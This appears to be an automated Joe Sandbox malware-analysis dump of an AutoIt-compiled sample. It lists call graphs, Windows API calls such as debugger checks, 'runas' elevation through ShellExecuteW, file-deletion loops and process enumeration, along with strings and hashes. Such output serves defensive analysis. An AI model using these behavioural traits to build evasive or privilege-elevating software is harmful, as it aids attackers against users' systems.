97930->97938 97932 1ff153 97932->97919 97932->97921 97932->97928 97933->97914 97934->97928 97935->97926 97936->97928 97937->97928 97939 209612 ___BuildCatchObject 97938->97939 97940 209632 97939->97940 97941 20961a 97939->97941 97943 2096e6 97940->97943 97948 20966a 97940->97948 97964 1ff636 20 API calls __dosmaperr 97941->97964 97969 1ff636 20 API calls __dosmaperr 97943->97969 97944 20961f 97965 1ff649 20 API calls __dosmaperr 97944->97965 97947 2096eb 97970 1ff649 20 API calls __dosmaperr 97947->97970 97963 2054ba EnterCriticalSection 97948->97963 97951 2096f3 97971 202b5c 26 API calls pre_c_initialization 97951->97971 97952 209670 97954 209694 97952->97954 97955 2096a9 97952->97955 97966 1ff649 20 API calls __dosmaperr 97954->97966 97957 20970b __wsopen_s 28 API calls 97955->97957 97956 209627 __wsopen_s 97956->97932 97960 2096a4 97957->97960 97959 209699 97967 1ff636 20 API calls __dosmaperr 97959->97967 97968 2096de LeaveCriticalSection __wsopen_s 97960->97968 97963->97952 97964->97944 97965->97956 97966->97959 97967->97960 97968->97956 97969->97947 97970->97951 97971->97956 97972 225650 97981 1ee3d5 97972->97981 97974 225666 97976 2256e1 97974->97976 97990 1eaa65 9 API calls 97974->97990 97979 2261d7 97976->97979 97992 243fe1 81 API calls __wsopen_s 97976->97992 97978 2256c1 97978->97976 97991 24247e 8 API calls 97978->97991 97982 1ee3f6 97981->97982 97983 1ee3e3 97981->97983 97985 1ee3fb 97982->97985 97986 1ee429 97982->97986 97993 1db4c8 8 API calls 97983->97993 97987 1f014b 8 API calls 97985->97987 97994 1db4c8 8 API calls 97986->97994 97989 1ee3ed 97987->97989 97989->97974 97990->97978 97991->97976 97992->97979 97993->97989 97994->97989 97995 1f076b 97996 1f0777 ___BuildCatchObject 97995->97996 98025 1f0221 97996->98025 97998 1f077e 97999 1f08d1 97998->97999 98003 1f07a8 97998->98003 98063 1f0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97999->98063 98001 1f08d8 98064 1f51c2 28 API 
calls _abort 98001->98064 98004 1f07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98003->98004 98036 2027ed 98003->98036 98012 1f0848 98004->98012 98059 1f518a 38 API calls 3 library calls 98004->98059 98005 1f08de 98065 1f5174 28 API calls _abort 98005->98065 98009 1f08e6 98010 1f07c7 98044 1f0cc9 98012->98044 98014 1f084e 98048 1d331b 98014->98048 98019 1f086a 98019->98001 98020 1f086e 98019->98020 98021 1f0877 98020->98021 98061 1f5165 28 API calls _abort 98020->98061 98062 1f03b0 13 API calls 2 library calls 98021->98062 98024 1f087f 98024->98010 98026 1f022a 98025->98026 98066 1f0a08 IsProcessorFeaturePresent 98026->98066 98028 1f0236 98067 1f3004 10 API calls 3 library calls 98028->98067 98030 1f023b 98031 1f023f 98030->98031 98068 202687 98030->98068 98031->97998 98034 1f0256 98034->97998 98037 202804 98036->98037 98038 1f0dfc CatchGuardHandler 5 API calls 98037->98038 98039 1f07c1 98038->98039 98039->98010 98040 202791 98039->98040 98041 2027c0 98040->98041 98042 1f0dfc CatchGuardHandler 5 API calls 98041->98042 98043 2027e9 98042->98043 98043->98004 98119 1f26b0 98044->98119 98047 1f0cef 98047->98014 98049 1d3327 IsThemeActive 98048->98049 98050 1d3382 98048->98050 98121 1f52b3 98049->98121 98060 1f0d02 GetModuleHandleW 98050->98060 98052 1d3352 98127 1f5319 98052->98127 98054 1d3359 98134 1d32e6 SystemParametersInfoW SystemParametersInfoW 98054->98134 98056 1d3360 98135 1d338b 98056->98135 98058 1d3368 SystemParametersInfoW 98058->98050 98059->98012 98060->98019 98061->98021 98062->98024 98063->98001 98064->98005 98065->98009 98066->98028 98067->98030 98072 20d576 98068->98072 98071 1f302d 8 API calls 3 library calls 98071->98031 98075 20d593 98072->98075 98076 20d58f 98072->98076 98074 1f0248 98074->98034 98074->98071 98075->98076 98078 204f6e 98075->98078 98090 1f0dfc 98076->98090 98079 204f7a ___BuildCatchObject 98078->98079 98097 2032d1 EnterCriticalSection 98079->98097 98081 204f81 98098 205422 98081->98098 98083 204f90 
98084 204f9f 98083->98084 98111 204e02 29 API calls 98083->98111 98113 204fbb LeaveCriticalSection _abort 98084->98113 98087 204f9a 98112 204eb8 GetStdHandle GetFileType 98087->98112 98088 204fb0 __wsopen_s 98088->98075 98091 1f0e07 IsProcessorFeaturePresent 98090->98091 98092 1f0e05 98090->98092 98094 1f0fce 98091->98094 98092->98074 98118 1f0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98094->98118 98096 1f10b1 98096->98074 98097->98081 98099 20542e ___BuildCatchObject 98098->98099 98100 205452 98099->98100 98101 20543b 98099->98101 98114 2032d1 EnterCriticalSection 98100->98114 98115 1ff649 20 API calls __dosmaperr 98101->98115 98104 205440 98116 202b5c 26 API calls pre_c_initialization 98104->98116 98106 20544a __wsopen_s 98106->98083 98107 20548a 98117 2054b1 LeaveCriticalSection _abort 98107->98117 98109 20545e 98109->98107 98110 205373 __wsopen_s 21 API calls 98109->98110 98110->98109 98111->98087 98112->98084 98113->98088 98114->98109 98115->98104 98116->98106 98117->98106 98118->98096 98120 1f0cdc GetStartupInfoW 98119->98120 98120->98047 98122 1f52bf ___BuildCatchObject 98121->98122 98184 2032d1 EnterCriticalSection 98122->98184 98124 1f52ca pre_c_initialization 98185 1f530a 98124->98185 98126 1f52ff __wsopen_s 98126->98052 98128 1f533f 98127->98128 98129 1f5325 98127->98129 98128->98054 98129->98128 98189 1ff649 20 API calls __dosmaperr 98129->98189 98131 1f532f 98190 202b5c 26 API calls pre_c_initialization 98131->98190 98133 1f533a 98133->98054 98134->98056 98136 1d339b __wsopen_s 98135->98136 98137 1dbf73 8 API calls 98136->98137 98138 1d33a7 GetCurrentDirectoryW 98137->98138 98191 1d4fd9 98138->98191 98140 1d33ce IsDebuggerPresent 98141 1d33dc 98140->98141 98142 213ca3 MessageBoxA 98140->98142 98143 213cbb 98141->98143 98144 1d33f0 98141->98144 98142->98143 98295 1d4176 8 API calls 98143->98295 98259 1d3a95 98144->98259 98149 1d3462 98153 213cec SetCurrentDirectoryW 98149->98153 98154 1d346a 98149->98154 
98153->98154 98155 1d3475 98154->98155 98296 231fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 98154->98296 98291 1d34d3 7 API calls 98155->98291 98159 213d07 98159->98155 98161 213d19 98159->98161 98163 1d5594 10 API calls 98161->98163 98162 1d347f 98165 1d396b 60 API calls 98162->98165 98169 1d3494 98162->98169 98164 213d22 98163->98164 98166 1db329 8 API calls 98164->98166 98165->98169 98167 213d30 98166->98167 98170 213d38 98167->98170 98171 213d5f 98167->98171 98168 1d34af 98175 1d34b6 SetCurrentDirectoryW 98168->98175 98169->98168 98172 1d3907 Shell_NotifyIconW 98169->98172 98173 1d6b7c 8 API calls 98170->98173 98174 1d6b7c 8 API calls 98171->98174 98172->98168 98176 213d43 98173->98176 98177 213d5b GetForegroundWindow ShellExecuteW 98174->98177 98178 1d34ca 98175->98178 98180 1d7bb5 8 API calls 98176->98180 98181 213d90 98177->98181 98178->98058 98182 213d51 98180->98182 98181->98168 98183 1d6b7c 8 API calls 98182->98183 98183->98177 98184->98124 98188 203319 LeaveCriticalSection 98185->98188 98187 1f5311 98187->98126 98188->98187 98189->98131 98190->98133 98192 1dbf73 8 API calls 98191->98192 98193 1d4fef 98192->98193 98297 1d63d7 98193->98297 98195 1d500d 98196 1dbd57 8 API calls 98195->98196 98197 1d5021 98196->98197 98198 1dbed9 8 API calls 98197->98198 98199 1d502c 98198->98199 98311 1d893c 98199->98311 98202 1db329 8 API calls 98203 1d5045 98202->98203 98204 1dbe2d 39 API calls 98203->98204 98205 1d5055 98204->98205 98206 1db329 8 API calls 98205->98206 98207 1d507b 98206->98207 98208 1dbe2d 39 API calls 98207->98208 98209 1d508a 98208->98209 98210 1dbf73 8 API calls 98209->98210 98211 1d50a8 98210->98211 98314 1d51ca 98211->98314 98214 1f4d98 40 API calls 98215 1d50c2 98214->98215 98216 1d50cc 98215->98216 98217 214b23 98215->98217 98218 1f4d98 40 API calls 98216->98218 98219 1d51ca 8 API calls 98217->98219 98220 1d50d7 98218->98220 98221 214b37 98219->98221 98220->98221 98222 1d50e1 98220->98222 98223 1d51ca 8 API calls 98221->98223 98224 

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 001D5FF7
  • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
• GetCurrentProcess.KERNEL32(?,0026DC2C,00000000,?,?), ref: 001D6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 001D612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001D6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001D6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 001D6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 001D617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 001D61A1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: d1c4c0c6981f32fc57b0ea35bf4082a8b4f496f61d7cedfd66eef01f75e9fb54
• Instruction ID: 7c9cbf225bcaabb7f7854b943efd89ad368501aa5535b220722a62faaebf40af
• Opcode Fuzzy Hash: d1c4c0c6981f32fc57b0ea35bf4082a8b4f496f61d7cedfd66eef01f75e9fb54
• Instruction Fuzzy Hash: B0A1802291A3D4DFCF16DB6C7C491A57FA4AB77300B0858DAE48597322DB6D498CCB31

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001D3368,?), ref: 001D33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001D3368,?), ref: 001D33CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,002A2418,002A2400,?,?,?,?,?,?,001D3368,?), ref: 001D343A
  • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
  • Part of subcall function 001D425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001D3462,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 001D42A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 001D34BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00213CB0
• SetCurrentDirectoryW.KERNEL32(?,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 00213CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002931F4,002A2418,?,?,?,?,?,?,?,001D3368), ref: 00213D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00213D81
  • Part of subcall function 001D34D3: GetSysColorBrush.USER32(0000000F), ref: 001D34DE
  • Part of subcall function 001D34D3: LoadCursorW.USER32(00000000,00007F00), ref: 001D34ED
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadIconW.USER32(00000063), ref: 001D3503
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadIconW.USER32(000000A4), ref: 001D3515
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadIconW.USER32(000000A2), ref: 001D3527
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001D353F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: RegisterClassExW.USER32(?), ref: 001D3590
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001D35E1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001D3602
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D3616
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D361F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001D3A3C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • 0$*, xrefs: 001D3495
                                                                                                                                                                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00213CAA
                                                                                                                                                                                                                                                                                                                            • runas, xrefs: 00213D75
                                                                                                                                                                                                                                                                                                                            • AutoIt, xrefs: 00213CA5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: 0$*$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                                            • API String ID: 683915450-183482344
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 14a27f78dd006783ae3cdd01bfc07d218fc6da056653870bc446fae68963eac9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2bf3903d04d5e8be0ee5472940355cdf625513c3cc51cfbfcbd7515380c29873
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14a27f78dd006783ae3cdd01bfc07d218fc6da056653870bc446fae68963eac9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49512D7020C345EFDB05EF64AC49D6E7BE99FA6744F00042EF492522A2DF68865DC753

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 1741 23dc54-23dc9b call 1dbf73 * 3 call 1d5851 call 23eab0 1752 23dcab-23dcdc call 1d568e FindFirstFileW 1741->1752 1753 23dc9d-23dca6 call 1d6b7c 1741->1753 1757 23dd4b-23dd52 FindClose 1752->1757 1758 23dcde-23dce0 1752->1758 1753->1752 1759 23dd56-23dd78 call 1dbd98 * 3 1757->1759 1758->1757 1760 23dce2-23dce7 1758->1760 1762 23dd26-23dd38 FindNextFileW 1760->1762 1763 23dce9-23dd24 call 1dbed9 call 1d7bb5 call 1d6b7c DeleteFileW 1760->1763 1762->1758 1764 23dd3a-23dd40 1762->1764 1763->1762 1776 23dd42-23dd49 FindClose 1763->1776 1764->1758 1776->1759
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023EAB0: GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0023DCCB
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0023DD1B
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0023DD2C
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023DD43
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023DD4C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 88deb708b06e705a47864dd868acc9120d0c56a23c3332b8ed8253bc0ac99f1d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dfbe216e3a357d84493d9185cfa6ad50f2ba126a37d0f174909462ec70b62b93
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88deb708b06e705a47864dd868acc9120d0c56a23c3332b8ed8253bc0ac99f1d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231A27102C349ABC701EF60D8958AFB7E9BEA5304F404D1EF4D282291EB60DA19CB53
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0023DDAC
                                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0023DDBA
                                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0023DDDA
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0023DE87
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 736c985c0c6847aafa976087f9ae5512a812fcbe89d1b594175a9daac8eafd7b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ab80ccfcff7ab32e0135016eeb2ffda71840defbe4d7775f871cbe42890ac8ea
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 736c985c0c6847aafa976087f9ae5512a812fcbe89d1b594175a9daac8eafd7b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A331B671108301DFD711EF50DC85AAFBBE8AFA9344F14092EF586872A1EB71D945CB92

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: 4&$@&$P&$`**$`&$d0b$d10m0$d1b$d1r0,2$d5m0$e#*$i$t&$t&$(*$(*$(*$(*$&$&
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-3573905116
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3356dca6d417c025fcab5af5471cb4de0a2430fb679de4eff82b06821b72a8b7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d2aa88f41392824ed73cf6ca0bb95e7c22413c0bc79e209580c4755b88d0399c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3356dca6d417c025fcab5af5471cb4de0a2430fb679de4eff82b06821b72a8b7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB626970619386DFC728DF15D084AAABBE0FF99304F10895EE4898B351DB71E959CF82

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001D3709,?,?), ref: 001D3777
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,001D3709,?,?), ref: 001D37A3
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001D37C6
                                                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001D3709,?,?), ref: 001D37D1
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 001D37E5
                                                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 001D3806
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                                            • String ID: 0$*$0$*$TaskbarCreated
                                                                                                                                                                                                                                                                                                                            • API String ID: 129472671-478030667
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5ea0ec30c2f23a0a225b9a4d93026b868270d266d0e84e246e4a51e432e7b73e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a8949b8af7649357e0b2ec3b0fd43345a7b66e422f5cb284e343590c4bc45aeb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ea0ec30c2f23a0a225b9a4d93026b868270d266d0e84e246e4a51e432e7b73e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C4104F1610645FBDB1D6B2CAC4DBBA3AA5EB16300F144126F62185390CFB49B58D663

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 001D3657
                                                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 001D3681
                                                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001D3692
                                                                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 001D36AF
                                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001D36BF
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 001D36D5
                                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001D36E4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915

Control-flow Graph
APIs
  • Part of subcall function 0021071A: CreateFileW.KERNEL32(00000000,00000000,?,00210A84,?,?,00000000,?,00210A84,00000000,0000000C), ref: 00210737
• GetLastError.KERNEL32 ref: 00210AEF
• __dosmaperr.LIBCMT ref: 00210AF6
• GetFileType.KERNEL32(00000000), ref: 00210B02
• GetLastError.KERNEL32 ref: 00210B0C
• __dosmaperr.LIBCMT ref: 00210B15
• CloseHandle.KERNEL32(00000000), ref: 00210B35
• CloseHandle.KERNEL32(?), ref: 00210C7F
• GetLastError.KERNEL32 ref: 00210CB1
• __dosmaperr.LIBCMT ref: 00210CB8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175

Control-flow Graph

APIs
  • Part of subcall function 001D5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 001D55B2
  • Part of subcall function 001D5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001D525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001D53C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00214BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00214C3E
• RegCloseKey.ADVAPI32(?), ref: 00214C80
• _wcslen.LIBCMT ref: 00214CE7
• _wcslen.LIBCMT ref: 00214CF6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
